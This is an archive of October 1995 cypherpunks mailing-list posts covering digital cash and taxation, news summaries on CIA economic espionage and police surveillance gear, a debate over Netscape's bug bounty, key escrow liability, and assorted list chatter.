> I'm guessing that you're talking about the fact that fully applied
> crypto (e. g. fully anonymous digital cash) makes it essentially
> impossible to base a tax system on income.

Yep.

> With full application in place, a government would be forced to shift
> the basis of the tax system toward `real assets' and the receiving of
> goods and services within its borders.  However, outside of
> transactions involving pure information exchange, this simply shifts
> things from one side to the other in a relationship where the basic

I am also projecting a transition from physical to non-physical goods and 
services.  Thus most entertainment, financial services/investing, 
professional services, and indeed the rest of employment services will 
tend to be non-physical.  We see a lot of unbundling already in which 
services are split off from the more physical parts of a transaction.  
Drop shipping, contracting out, etc. 

> Earnings tend to correlate reasonable well with receiving goods and
> services, at least over long periods of times.  Also most people are
> more or less tied to a certain area of the world.  Certainly there are
> exceptions, but the average case is more relevent when considering

Say that it was 1750 and you were a French Physiocrat.  You might say 
that land and agriculture should be taxed because that represented the 
only important part of the economy and the nation's wealth.  The making 
of goods was insignificant.  You would have ignored what was to become a 
big part of the economy.  It is possible that the non-physical part of 
the economy will become much bigger than the physical.

Note that most money itself is non-physical.  And if the physical part of 
the economy is taxed and the non-physical isn't the market will be 
skewed in favor of non-taxed activities.  

Also even though most people are geographically bound, if their 
consumption switches to non physical goods, they can acquire these goods 
anonymously or securely from any place on earth.  So even if you don't 
travel, the locus of your transactions can.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 15 Oct 95 05:13:36 PDT
To: cypherpunks@toad.com
Subject: DUM_not
Message-ID: <199510151213.IAA09188@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-15-95. NYPaper, longish Page One semi-rehash, semi-
   disinfo of LATimes of July 23:


   "Emerging Role For the C.I.A.: Economic Spy."

      During the Clinton Administration's tense negotiations
      with Japan last spring Mickey Kantor received inside
      information gathered by the C.I.A.'s Tokyo station and
      the electronic eavesdropping equipment of the N.S.A.
      "But in the end, did it help much? Beyond some valuable
      detail we could not have gotten elsewhere, did it tell
      us much about which way Hashimoto would go? It would be
      hard to make that case."

      Many Administration officials suggest that the agency
      simply does not have the talent for such analysis. "The
      best graduate students don't go there and who can blame
      them?" said one of the Administration's top economic
      officials. "And yet, when you sit in a meeting, the
      views of the C.I.A. are often given more weight than the
      Council of Economic Advisors. Go figure."

      Allan E. Goodman, a former C.I.A. official and academic
      dean of Georgetown University's School of Foreign
      Service, said "We don't have the sources, we don't have
      the expertise. To develop an understanding of the people
      who trade currencies, their motivations, their
      lifestyles, you'd have to send your people to Harvard,
      Stanford and Wharton for years. Currency traders keep
      secrets very, very well, and to penetrate that would be
      the equivalent of cracking all the Japanese codes in
      World War II."


   DUM_not  (14 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sun, 15 Oct 95 05:19:17 PDT
To: cypherpunks@toad.com
Subject: bouncing mail
Message-ID: <Pine.3.89.9510150811.B23794-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


Can anyone anyone get in touch with the bouncing mail guy, Jason P Jones
<jonesj@ala.usmc.mil> ? He needs to wipe that mailbox of his.
( I just tried to unsub him, I guess it's reassuring you can't get away 
with it without forging headers, which I can't do.)

rom owner-cypherpunks  Sun Oct 15 05:19:24 1995
Return-Path: <owner-cypherpunks>
Received: by toad.com id AA09946; Sun, 15 Oct 95 05:19:24 PDT
Received: from panix.com by toad.com id AA09937; Sun, 15 Oct 95 05:19:20 PDT
Received: (from frissell@localhost) by panix.com (8.7/8.7/PanixU1.3) id IAA25104; Sun, 15 Oct 1995 08:19:18 -0400 (EDT)
Date: Sun, 15 Oct 1995 08:19:18 -0400 (EDT)
From: Duncan Frissell <frissell@panix.com>
To: Alan Westrope <adwestro@ouray.cudenver.edu>
Cc: cypherpunks@toad.com
Subject: Re: TSB_pbs
In-Reply-To: <BBPgwkkAsmsM085yn@ouray.cudenver.edu>
Message-Id: <Pine.SUN.3.91.951015081704.22935B-100000@panix.com>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-cypherpunks@toad.com
Precedence: bulk


On Sun, 15 Oct 1995, Alan Westrope wrote:

> I assume this refers to TSB Bank Channel Islands Limited, 8 David
> Place, PO Box 597, St. Helier, Jersey (NOT Joisey!), JE4 8XW.
> 

No, I would assume that it refers to the parent company TSB on the 
mainland UK.  It has an extensive branch network in the UK.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 15 Oct 95 05:53:59 PDT
To: cypherpunks@toad.com
Subject: Re: Yes, indeed the PA law is for real!
Message-ID: <9510151251.AA07819@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Historic comment: ... "You read it here first."

Nostradamus said it way before you.

This kind of dredging up old posts in order to claim certain foresight
intellectual properties is kinda silly.  Watcha gonna do, patent it?

It's gonna rain tomorrow.  You heard it here first.  Of course, I don't
plan on doing anything about it other than tell you all...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 15 Oct 95 09:10:34 PDT
To: cypherpunks@toad.com
Subject: Re: Int'l Money Laundering, Part the Second
Message-ID: <199510151610.JAA02950@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:31 PM 10/10/95 -0800, Douglas Barnes wrote:
> When you combine these elements, you get a strategy that
> permits the US government to confiscate worldwide correspondent
> accounts of banks, even if they don't have a US presence.

This is doubtless one of the reasons why the US$ is rapidly losing 
its place as the preferred currency for international transactions.

>  acceptance of US-dollar negotiable instruments by a bank anywhere
>  in the world outside of the US renders the bank susceptible
>  to US criminal jurisdiction in the money laundering field.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 15 Oct 95 09:31:27 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: Idea Futures
Message-ID: <aca6848b190210045cc4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:40 AM 10/15/95, s1018954@aix2.uottawa.ca wrote:
>On Sun, 15 Oct 1995, Timothy C. May wrote:
>
>> (Some of his game theory simulations--on betting markets and
>> preference-revealing--were a main inspiration for the "Crypto Anarchy Game"
>> I put on at the first Cypherpunks meeting in '92.)
>>
>How did that work out anyway? What were the rules and usual outcomes?
>(Got a file on it anywhere? In your faq?)
>Sounds like something that'd be nice to implement over the net. Great way
>to get everyone's productivity reduced to zero. (insert wry smile)

To educate the folks about the technologies now more common (mixes, digital
cash, information markets, data havens...), we simulated on paper these
things. For example, certain people were randomly assigned the role of
being a "mix" (remailer), with envelopes addressed to them being openable
only by them, and with them then remailing to the next destination.

The game went on for about 5 hours, amidst much confusion and hilarity, and
helped to show people how ecologies of anonymous and pseudonymous entities
could interact.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 15 Oct 95 07:07:57 PDT
To: cypherpunks@toad.com
Subject: ORW_lea
Message-ID: <199510151407.KAA15071@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-15-95. NYPaper:


   "Law Enforcement and Privacy Interests Clash on
   Technology."

      The legality of mobil data terminals, which put records
      at the fingertips of officers in their cars, is in
      question. Some other machines could well be props in a
      James Bond movie: long-range eavesdropping devices that,
      placed in a briefcase, pick up conversations a football
      field away, or infrared radar monitors that, mounted on
      a car, can detect weapons on a person a half-mile away.
      For law enforcement officials, they are new-generation
      weapons in the war on crime that enable the police to
      better protect the public, even at the expense of a
      little privacy. But for civil libertarians, they conjure
      Orwellian images of Big Brother armed with technologies
      that are subject to abuse and prone to error.


   ORW_lea  (8 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 15 Oct 95 07:28:12 PDT
To: cypherpunks@toad.com
Subject: National Insitute of Justice
Message-ID: <199510151428.KAA16889@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


For more on the NIJ, oft-cited by The NYT as the sponsor of 
wizard crime fighting devices, see:


     URL: http://ncjrs.aspensys.com:81/aboutnij.html


There are helpful links there to the ever-expanding universe of 
the terrifying trust-me evangelists.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@cmu.edu (Matthew Ghio)
Date: Sun, 15 Oct 95 10:31:08 PDT
To: cypherpunks@toad.com
Subject: Re: Yes, indeed the PA law is for real!
In-Reply-To: <Pine.SUN.3.91.951013183116.11492A@access5.digex.net>
Message-ID: <m0t4U4H-00134sC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Rick Busdiecker (rfb@lehman.com) wrote:
> I'm guessing that you're referring to this part of the law:

>   (1) [makes or possesses any instrument, apparatus, equipment or]
>   makes, distributes, possesses, uses or assembles an unlawful
>   telecommunication device or modifies, alters, programs or reprograms
>   a telecommunication device designed, adapted or which can be used:
    . . .
>   (ii) to conceal or to assist another to conceal from any [supplier
>   of telecommunications] telecommunicationservice provider or from any
>   lawful authority the existence or place of origin or of destination
>   of any telecommunication; or

Well, given that I haven't seen any Bell employees rushing to tear out
payphones, I suspect that if it ever went to court, they'd have to show
intent to commit or assist fraud.  Since anonymous remailers (and
payphones, prepaid calling cards, etc) have legitimate uses, they can't
prove you were intending to assist crime by providing those services.
There's also the ECPA protections...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julius Cisek <jules@netscape.com>
Date: Sun, 15 Oct 95 11:49:34 PDT
To: cypherpunks@toad.com
Subject: Re: Guess what I found...
In-Reply-To: <199510140816.CAA07071@bert.cs.byu.edu>
Message-ID: <30815766.3A8D@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Donald M. Kitchen wrote:
> rryan@blackhills.com (Richard Ryan) writes:
> >Had my first hard core, proveable case of MSN reading someones drive. Store
> >Client had entered fantasy company name upon installing a program. Forgot about
> >it, didn't tell anyone. 2 days after downloading a simple text file from MSN a
> >junk mail offering from Pitney-Bowes showed up in his snail mailbox addressed
> >to him c/o the fantasy company. Somebody is playing somewhere they shouldn't
> >be. Any comments, Microsoft?
> 
> I registered as Richard E. Graves (changing middle initials and adding an
> unnecessary suite number to your address are good ways to track who has
> been selling whom your address). Richard E. Graves also received mail from
> Pitney-Bowes.
> 
> Microsoft says they don't sell their mailing lists. Clearly, someone has
> taken advantage of security holes in the NT servers that make up MSN and
> *stole* the mailing lists. Maybe unauthorized external access accounts for
> the abysmal performance of MSN, in part.

Hmmm...  Did you guys check the box that says not to give your name out when 
signing up?  I did and I haven't gotten any junk mail yet.  I've been using MSN for 
half a year now.  Of course if there is a security hole, then the checkbox would 
hardly matter.

-- 

~Jules (Julius Cisek)   /- __  -   mailto:jules@netscape.com
Server Eng, NETSCAPE  /\ >\=/\ --- http://home.netscape.com/people/jules
MtnView-CA-USA-Earth  \/   -\/ --  p:415.528.2968 f:415.528.4122
          ---===> COGITO ERGO VROOM <===---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sun, 15 Oct 95 11:48:36 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510151855.OAA20783@slack.lne.com>
Message-ID: <199510151848.LAA22933@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Eric Murray <ericm@lne.com> writes:
> What the hell is wrong with you people?  Up 'til a few months
> ago, the oft-heard refrain on cipherpunks was "why won't the

What do you mean "you people"?  There are <lots> of people on this list,
with lots of different opinions.  Don't attribute this kvetching to
Cypherpunks in general.  In fact, don't attribute <any> opinion to
Cypherpunks in general.  Probably most of the non-press members here share
an interest in helping people communicate privately, but that's about it.

We're all individuals here.
				[small voice in back of crowd: "I'm not."]

	Jim Gillogly
	24 Winterfilth S.R. 1995, 18:46




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Sat, 14 Oct 95 21:23:04 PDT
To: alano@teleport.com (Alan Olsen)
Subject: Re: airport security
In-Reply-To: <199510141621.JAA19984@desiree.teleport.com>
Message-ID: <199510150048.AA29926@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


Crypto relevance: none.

>I remember back during one of the previous FAA panics over terrorism.  I was
>at the Portland airport discussing the measures with an FAA inspector.  He
>explained why they had to have all the searches and stuff to stop anyone
>from blowing up the plane.  I pointed out to him that if anyone wanted to do
>that, they would just lay off a line of mortars from the hills overlooking
>the airport across the river.  He got very quiet and very worried...

Heh, one of our products gets a direct feed from the radar and flight track
info and displays it on a real time screen showing planes, noise levels and
other cutesy stuff in 3d. This sort of thing would be picked up and you could
replay over and over the dot of the mortar hitting the plane, or a SAM missile
coming up to the plane and both falling to the ground.

Normal use is for telling off pilots for flying outside the environmental
guidelines, or attaching resident complaints to flights but we have the odd
scare sitting in the databases. Problem is (??) that since Australia has such
high safety standards, we have to get all the booboo's from our international
sites.

Cheers,
Mark
mark@lochard.com.au



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sun, 15 Oct 95 11:34:01 PDT
To: jya@pipeline.com (John Young)
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510151619.MAA25730@pipe4.nyc.pipeline.com>
Message-ID: <199510151855.OAA20783@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Responding to msg by stripes@va.pubnix.com ("Josh M. Osborne") 
> on Sun, 15 Oct 12:0  AM
> 
> 
> The PR of Bugs Bounty is the aim, as the quick-market-adapter 
> Netscape Chair speechified in FR.
> 
> 
> Promoting the notion that hackers are earnestly attacking 
> Netscape and reporting its bugs increases its credibility to 
> the stock market porkers. Is that not why dear 
> all-too-attentive Jeff has been assigned duty on this list, 
> feeding peanuts to chimp hackers and champ newshacks?

Sir.

I'm afraid you're a little out of line here.
I've worked with Jeff at a couple different companies
over the last 6 years.  Besides being a very good programmer
he's also one of the people I consider the most resistant
to corportate bullstuff (beleive me, we both got a lot of it at MicroUnity). 
I'm sure he's on this list because he thinks it's a good
idea to pay attention to it.


What the hell is wrong with you people?  Up 'til a few months
ago, the oft-heard refrain on cipherpunks was "why won't the
software vendors listen to us?"... now they're listening, and
pretty much all I see is complaints of "only a lousy thousand bucks!"
or "I sent this mail a whole two days ago and netscape hasn't opened
a dialog with me yet!"  or insulting their programmers for participating
on the list.   They're here, and listening, with real programmers
not PR weenies, and all most of you are doing is complaining.  


Yes, Netscrape turned getting hacked into a PR campaign via
the Bounty thing.  So?  You expected different?  PR is what
businesses do if they want to stay in business.   If you don't like
it you don't have to participate in the program.  If you think
that the token $1000 is insulting, you can give it to charity, or
go sell your hack for more $$ to Blacknet. :-)



-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
 Redistribution of this message without the author's permission is forbidden!
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sun, 15 Oct 95 08:59:06 PDT
To: bugtraq@fc.net
Subject: I am looking for a way to create a zombie process
Message-ID: <9510151556.AA26716@all.net>
MIME-Version: 1.0
Content-Type: text


I am writing a paper that, among other things, talks about detecting
zombie processes.  I find that, due to my systematic hunting down and
eliminating of these processes, I no longer have any hanging around for
demonstration purposes.  How embarassing - I don't know how to create
one!

Is there anyone who can give me a simple program or set of commands that
creates a zombie process? Thanks in advance. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Sun, 15 Oct 95 09:00:44 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510141801.AA01730@all.net>
Message-ID: <MAA21936.199510151600@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9510141801.AA01730@all.net>, Dr. Frederick B. Cohen writes:
[...]
>The $25K is a trivial amount for finding such a hole in a product that
>is supposed to secure billions of dollars worth of electronic funds
>transfers.  If the bad guys find a hole, it could easily cost millions. 
>If you don't believe me, look at the statistics for other holes in the
>credit card and telecommunications businesses.  They losses are in the
>billions each year. 
[...]

Note well: Netscape is offering this reward for finding bugs in *beta*
release code.  In other words the code that they *know* crashes, code
that they susspect has security releated bugs, code that they don't think
is (yet) good enough to charge a mesely $40 for!

If they don't get buried in bad press for this, I would guess that they
may have a diffrent program with a diffrent set reward for finding bugs
in their for-sale version.  Or not.  After all I susspect that like most
other places they are more intrested in making the next product the best
in the world then making the last one "as good as the box says".

Besides nobody said you have to report your bugs to Netscape just because
they gave you free software and offered some sort of reward for finding
bugs.  If you don't think the "pay" (including the posability of having
the software fixed) is high enough, don't report the bugs.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: imschira@nyx10.cs.du.edu (Ian M. Schirado)
Date: Sun, 15 Oct 95 11:11:04 PDT
To: cypherpunks@toad.com
Subject: (fwd) CyberSpace Detective Agency
Message-ID: <9510151810.AA28127@nyx10.cs.du.edu>
MIME-Version: 1.0
Content-Type: text/plain


Path: mnemosyne.cs.du.edu!hermes.cair.du.edu!carbon!csn!gw1.att.com!gw2.att.com!news.midplains.net!chi-news.cic.net!newsfeed.internetmci.com!news.mathworks.com!newshost.marcam.com!Empire.Net!news.net99.net!news.crosslink.net!news.vais.net!ppp-b.vais.net!user
From: konowe@investigator.com (Dr. Lee Konowe)
Newsgroups: comp.infosystems.www.misc
Subject: CyberSpace Detective Agency
Date: Fri, 13 Oct 1995 10:18:14 -0700
Organization: Background Research International
Lines: 41
Message-ID: <konowe-1310951018140001@ppp-b.vais.net>
NNTP-Posting-Host: ppp-b.vais.net

Background Research International (B.R.I.) was the first online Detective
Agency to serve the Internet. B.R.I. is an affiliate of the FairFax Group,
Ltd. a world class corporate agency with offices and client firms
world-wide.  B.R.I. provides many of the information retrieval services,
first offered by the Fairfax Group and makes them available to small and
moderate sized businesses.

The purpose of this notice is to invite you to visit the B.R.I. home page at

http://www.investigator.com/bri

Our web page will introduce you to many of the B.R.I. services and explain
how a Public Records search firm can assist your company. Perhaps you are:

   

   

   
         BRI now offers the first resume verification service.  This 
         service means employee' resumes can now be verified prior to 
         submission to potential employers.

   

   

   


We believe you will be pleased with the many services offered and
surprised at the reasonable fee structure provided.

As an added incentive, when you decide to use our services, just tell your
B.R.I. investigator that you found out about B.R.I. from this newsgroup
and receive a 10% discount on your first order.

Sincerely,

Lee Konowe
Director/Internet Operations

--

--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
                 To be a skeptic is to refuse to be a victim.
       "This is my .sig. There are many like it, but this one is mine."
                            Freedom...yeah, right.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Sun, 15 Oct 95 09:17:41 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Cybersecurity
In-Reply-To: <Pine.SUN.3.91.950925060508.23639B-100000@panix.com>
Message-ID: <9510151616.AA02567@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

    Date: Sun, 15 Oct 1995 08:06:13 -0400 (EDT)
    From: Duncan Frissell <frissell@panix.com>

    I am also projecting a transition from physical to non-physical goods and
    services.  Thus most entertainment, financial services/investing,
    professional services, and indeed the rest of employment services will
    tend to be non-physical.  We see a lot of unbundling already in which
    services are split off from the more physical parts of a transaction.
    Drop shipping, contracting out, etc.

I agree with this projection as a shift in weight.  Presumably we can
also agree that the transition could never be total.  People will
continue to need and/or desire a significant number of physical goods
as well as services which involve the physical interaction.

    Say that it was 1750 and you were a French Physiocrat.  You might say
    that land and agriculture should
                              ^^^^^^

This single word represents a significant shift in the discussion.  Up
to this point, my understanding is that we were discussing what is,
and what we believe is possible in the future.  With the introduction
of `should' we veer away from that direction toward the more
philosophical.  While I enjoy philosophical discussions a great deal,
I doubt that we could find nearly as much common ground as we might if
we focussed on what is possible.  While I am a civil libertarian, I am
not an economic libertarian, as I believe you are.  I would expect
economic issues to be the focus of our differences in a philosophical
discussion, but they need not divide us in discussions outside of
philosophy.

    It is possible that the non-physical part of the economy will
    become much bigger than the physical.

I agree that this is quite possible.

    Note that most money itself is non-physical.

Agreed in part.  However, as we have seen already, non-physical
representations of money are not taken very seriously when it is
impossible, or even very difficult, to exchange them for physical
goods and services requiring physical interactions.  Very few people
would accept CyberBucks in exchange for a car.

    And if the physical part of the economy is taxed and the
    non-physical isn't the market will be skewed in favor of non-taxed
    activities.

Agreed.  This is at least partially true already.  Certainly there are
investment instruments which are treated differently by the various
tax codes.  These differences certainly affect investors' decisions.
Still, there seem to be investors willing to purchase instruments
based on features other than taxability.

    Also even though most people are geographically bound, if their
    consumption switches to non physical goods, they can acquire these goods
    anonymously or securely from any place on earth.  So even if you don't
    travel, the locus of your transactions can.

Agreed.  As I said originally, I believe that ready access to strong
cryptography will eventually make government tracking of purely
information, i. e. non-physical, transactions infeasible.  At that
point, any feasible system of taxation will have to focus on physical
goods and services which involve physical interaction.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIEzZJNR+/jb2ZlNAQFZhgQAwvhVdXndL0qoRJL3O4QttBfeu3ebJmSk
ZPnFFL2kyUvUL+efsym0xVLmjtrLYf+P2OUJJ5puJf7LkNInqdH9+64juRynfqbT
lqamnDoj3QXXDcn8DMWhd8oMwXN0a+1+sIvI2c0xfkDZs8H7NBbsph6pFJSEgIf7
QrtCqn6utkc=
=ke/Q
-----END PGP SIGNATURE-----
--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Sun, 15 Oct 95 09:17:42 PDT
To: cypherpunks@toad.com
Subject: Re: WWW> One If By Congress, Two If By White House
In-Reply-To: <45lt48$db4@shocker.mid.net>
Message-ID: <N5o1cD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


Path: left!hypnos!ragnarok.oar.net!malgudi.oar.net!kira.cc.uakron.edu!neoucom.edu!news.ysu.edu!news.ecn.uoknor.edu!paladin.american.edu!gatech!newsxfer.itd.umich.edu!tank.news.pipex.net!pipex!news.mathworks.com!newsfeed.internetmci.com!news.mid.net!news.mid.net!not-for-mail
From: Gleason Sackman <sackman@plains.nodak.edu>
Newsgroups: comp.internet.net-happenings
Subject: WWW> One If By Congress, Two If By White House
Message-ID: <45lt48$db4@shocker.mid.net>
Date: 13 Oct 1995 09:29:28 -0500
Sender: infoserv@news.mid.net
Organization: MIDnet, the Midwest's Gateway to the Global Internet.
Lines: 14
Approved: ralphie
NNTP-Posting-Host: shocker.mid.net

*** From Net-Happenings Moderator ***

Date: Fri, 6 Oct 1995 07:51:13 -0500
From: jrw@ix.netcom.com

http://www.geopages.com/CapitolHill/1783

A website dedicated to Jeffersonian Conservatism, the   underlying 
 principle of which is a strong faith in the   American people -- the 
individual citizen -- rather than   in an overgrown, cumbersome, 
impersonal and too powerful   bureaucracy.  Good links to the entire 
political spectrum,   government, books, etc.  The goal is to provoke 
thoughtful   discussion and informed political action.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 15 Oct 95 09:19:31 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199510151619.MAA25730@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by stripes@va.pubnix.com ("Josh M. Osborne") 
on Sun, 15 Oct 12:0  AM


The PR of Bugs Bounty is the aim, as the quick-market-adapter 
Netscape Chair speechified in FR.


Promoting the notion that hackers are earnestly attacking 
Netscape and reporting its bugs increases its credibility to 
the stock market porkers. Is that not why dear 
all-too-attentive Jeff has been assigned duty on this list, 
feeding peanuts to chimp hackers and champ newshacks?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Shantz" <bshantz@nwlink.com>
Date: Sun, 15 Oct 95 09:28:37 PDT
To: "Josh M. Osborne" <stripes@va.pubnix.com>
Subject: Re: Netscape rewards are an insult
Message-ID: <9510151627.AA15802@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Josh Osborne writes: 
> Note well: Netscape is offering this reward for finding bugs in *beta*
> release code.  In other words the code that they *know* crashes, code
> that they susspect has security releated bugs, code that they don't think
> is (yet) good enough to charge a mesely $40 for!

Whoops, wrong.  BETA does not mean code "they know crashes."  In fact 
it is quite the opposite.  This is pre-release code that they are bug 
fixing.  most of the catastrophic bugs, they probably know about.  A 
BETA program is to increase the testing and quality assurance staff 
to find all of the bugs they DON'T know about.  Then, they will have a 
reasonable amount of time to fix those bugs before release.  It makes 
for a much more stable product.

Now, look at companies like SPRY/Compuserve or Logos Research 
Systems.  Both companies I have worked for.  SPRY didn't really have 
a BETA program that amounted to much until Internet in a Box version 
1.0.  Even that was a lame beta program.  Mostly internal use and 
testing.  Logos (a Bible software company) never even had a beta 
program.  As much as I like the guys at Logos, they released version 
2.0 recently and it's buggy.  Simple cosmetic things like not being 
able to "cancel" out of the options dialog, or "help" buttons taking 
you to wrong places in the help file, these are all things that would 
have been caught in a decent testing environment or a beta program.

Microsoft, who I don't necessarily like all the time, has a great 
beta program.  Usually it is several months to a year of intense 
testing, bug fixing, feature cleanup, usability testing, etc.  Their 
software may not be the best, but more often than not it is stable.

Anyway, I see Netscape's move to paying for beta testing will result 
in a more stable browser, and hopefully more secure software.

> If they don't get buried in bad press for this, I would guess that they
> may have a diffrent program with a diffrent set reward for finding bugs
> in their for-sale version.  

Why would they get bad press?

> Besides nobody said you have to report your bugs to Netscape just because
> they gave you free software and offered some sort of reward for finding
> bugs.  If you don't think the "pay" (including the posability of having
> the software fixed) is high enough, don't report the bugs.

Once again, Josh, I'm afraid I have to disagree with you on this one. 
 Especially in regards to secure software.  I see your point, but...
Whether or not you have to report the bugs is immaterial.  Netscape 
is doing a service by making their app available for testing before 
saying "this is secure."  As a person who does business over the net, 
if I found out that my software was NOT secure, I would seek either a 
secure update or another company's software.  If  I'm happy with 
Netscape's software, I'll report the bugs to improve it's quality.  
In my humble opinion, improving the software is reward enough.  Very 
few companies have paid beta programs.

I'd rather see bugs fixed before release than getting the bad press 
after release for shoddy workmanship.

Sorry this was so long.  I didn't mean to ramble.  I'll get off my 
soapbox now...

Brad


 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sun, 15 Oct 95 13:27:27 PDT
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: My chat with Goeff Greiveldinger
In-Reply-To: <Pine.SUN.3.91.951015155856.4677D-100000@viper.law.miami.edu>
Message-ID: <199510152027.NAA23085@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Michael Froomkin <froomkin@law.miami.edu> writes:
> I will be appearing with  Goeff Greiveldinger, he of the Justice Dept, at 
> a discussion of commercial key escrow next Thursday in Bethesda.  Anyone 
> with fun questions I should throw at him should contact me...

> Please note that the ostensible topic of this discussion is *commerical* 
> key escrow, not Clipper per se, so I have to be diplomatic....

You might try addressing the areas of liability for escrow agents.  If
private escrow agents can be sued for loss of information due to theft
or other authorized or unauthorized release of keys, their liability could
be horrendous, depending on the value of the compromised data. Gillogly
Software certainly will not be a commercial keyholder!

	Jim Gillogly
	24 Winterfilth S.R. 1995, 20:20




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 15 Oct 95 10:56:26 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <Pine.SUN.3.91.950925060508.23639B-100000@panix.com>
Message-ID: <Pine.SUN.3.91.951015135302.4606A-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Oct 1995, Duncan Frissell wrote:
> On Sun, 24 Sep 1995, Rick Busdiecker wrote:
> > I'm guessing that you're talking about the fact that fully applied
> > crypto (e. g. fully anonymous digital cash) makes it essentially
> > impossible to base a tax system on income.
> Yep.
[....]
Hold on.  This is more "factoid" than "fact":  recall that income is PAID 
by people as well as EARNED by people.  Most payers have easily 
detectible physical presence and assets that can easily be attached by 
regulators.   It will be a cold day before, e.g., my employer agrees not 
to report my earnings.  And the same is true for most employers in most 
industries.  

